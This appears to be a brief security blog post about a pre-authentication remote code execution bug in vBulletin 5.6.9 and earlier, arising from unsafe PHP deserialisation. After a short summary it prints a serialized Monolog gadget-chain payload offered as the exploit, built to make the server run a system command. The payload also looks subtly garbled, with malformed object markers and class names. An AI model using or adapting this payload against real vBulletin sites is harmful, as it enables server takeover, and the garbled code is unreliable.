vBulletin <= 5.6.9: Pre-authentication Remote Code Execution

The Ambionics Security team discovered a pre-authentication remote code execution in vBulletin 5.6.9.

According to the Ambionics researcher, this pre-auth Remote Code Execution vulnerability at vBulletin was reported in August of 2022  to the concerned team. Exploiting this unserialize() bug was tricky, as vBulletin classes are not deserialisable.

The bug was due to improper handling of non-scalar data in the ORM, which led to arbitrary deserialisation. The bug was patched in 5.6.9 PL1, 5.6.8 PL1, and 5.6.7 PL1 but no CVE was issued.

Exploit for the vBulletin <= 5.6.9: Pre-authentication Remote Code Execution

a:2:{i:0;0:27:"googlelogin_vendor_autoload":0:{}i:1;0:32:"MonologHandlerSyslogUdpHandler":1:{s:9:"*socket";0:29: "MonologHandlerBufferHandler":7:{s:10:"*handler";r:4;s:13: "*bufferSize";i:-1; s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized"; b: 1;s:14: "*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}

This post was created with our nice and easy submission form. Create your post!

What do you think?

Posted by SH

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

Pwning all Google Phone with Arm Mali GPU bug

Adobe Acrobat Reader RCE Bug- CVE-2023-21608